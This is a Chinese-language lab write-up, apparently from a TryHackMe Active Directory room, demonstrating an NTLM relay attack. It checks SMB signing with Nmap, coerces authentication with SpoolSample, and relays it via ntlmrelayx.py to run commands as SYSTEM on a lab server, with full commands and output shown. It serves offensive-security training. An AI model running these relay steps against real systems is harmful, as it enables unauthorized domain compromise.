:::color3 环境:

  • 攻击主机: 10.50.78.86
  • 目标:
    • THMSERVER1 10.200.79.201

:::

计算机账户

打印机错误

SMB 签名

为了中继强制认证尝试,SMB签名不应该被强制执行。应该注意的是,允许SMB签名和强制SMB签名之间是有区别的。由于一些遗留系统不支持SMB签名,在默认情况下,SMB的配置是允许签名但不强制执行,这意味着只有在支持的情况下才会使用。由于我们将托管一个恶意的SMB服务器,我们可以确保我们的服务器不支持签名,迫使目标不签署SMB认证尝试。

为了验证THMSERVER1和THMSERVER2没有强制执行SMB签名,我们可以在我们的攻击盒上使用Nmap。

  1. thm@thm:~# nmap --script=smb2-security-mode -p445 thmserver1.za.tryhackme.loc thmserver2.za.tryhackme.loc
  2. Nmap scan report for distributor.za.tryhackme.loc (172.31.1.201)
  3. Host is up (0.62s latency).
  5. PORT    STATE SERVICE
  6. 445/tcp open  microsoft-ds
  8. Host script results:
  9. | smb2-security-mode: 
  10. |   2.02: 
  11. |_    Message signing enabled but not required
  13. Nmap scan report for 172.31.1.202
  14. Host is up (0.38s latency).
  16. PORT    STATE SERVICE
  17. 445/tcp open  microsoft-ds
  19. Host script results:
  20. | smb2-security-mode: 
  21. |   2.02: 
  22. |_    Message signing enabled but not required
  24. Nmap done: 2 IP addresses (2 hosts up) scanned in 4.59 seconds

我们可以看到 SMB 签名已启用,但是没有输出强制执行

示例

此类攻击可能不稳定

我们将使用 SpoolSample 进行身份验证中继,这是一个 C# 漏洞,我们将使用 SpoolSample 强制身份验证,然后使用 ntlmrelayx.py 来中继身份验证来尝试,

第一步设置 NTLM 中继:

  1. thm@thm:~# python3.9 /opt/impacket/examples/ntlmrelayx.py -smb2support -t smb://"THMSERVER1 IP" -debug
如果我们指定 THMSERVER1 的主机名而不是 IP,主机可能会请求我们使用 Kerberos 身份验证而不是 NTLM。因此,我们应该指定 IP。通过中继侦听,我们现在可以强制 THMSERVER2 向我们进行身份验证。在 THMWRK1 上的 SSH 终端中,执行以下操作: 
  1. C:\Tools\>SpoolSample.exe THMSERVER2.za.tryhackme.loc "Attacker IP"
您的攻击者 IP 应与网络的 tunX 接口相对应。如果一切顺利,您应该已收到身份验证尝试和到 THMSERVER1 的中继。 
  1. thm$ python3.9 ntlmrelayx.py -smb2support -t smb://"THMSERVER1 IP" -c 'whoami /all' -debug
  2. [*] Servers started, waiting for connections
  3. [*] SMBD-Thread-5: Received connection from 172.31.1.202, attacking target smb://172.31.1.201
  4. [*] Authenticating against smb://172.31.1.201 as ZA/THMSERVER2$ SUCCEED
  5. [+] No more targets
  6. [*] SMBD-Thread-7: Connection from 172.31.1.202 controlled, but there are no more targets left!
  7. [+] No more targets
  8. [*] SMBD-Thread-8: Connection from 172.31.1.202 controlled, but there are no more targets left!
  9. [*] Service RemoteRegistry is in stopped state
  10. [*] Starting service RemoteRegistry
  11. [+] ExecuteRemote command: %COMSPEC% /Q /c echo whoami /all ^> %SYSTEMROOT%\Temp\__output > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat
  12. [*] Executed specified command on host: 172.31.1.201
  14. USER INFORMATION
  15. ----------------
  17. User Name           SID     
  18. =================== ========
  19. nt authority\system S-1-5-18
  22. GROUP INFORMATION
  23. -----------------
  25. Group Name                             Type             SID          Attributes                                        
  26. ====================================== ================ ============ ==================================================
  27. BUILTIN\Administrators                 Alias            S-1-5-32-544 Enabled by default, Enabled group, Group owner    
  28. Everyone                               Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
  29. NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
  30. Mandatory Label\System Mandatory Level Label            S-1-16-16384                                                   
  31. [...]
  1. C\ > SpoolSample.exe THMSERVER1.za.tryhackme.loc "10.50.78.86"
  2. thm@thm:~# python3.9 /opt/impacket/examples/ntlmrelayx.py  -smb2support -t smb://"10.200.79.201" -c 'whoami' -debug

中继器 - 图1

参考

TryHackMe | Cyber Security Training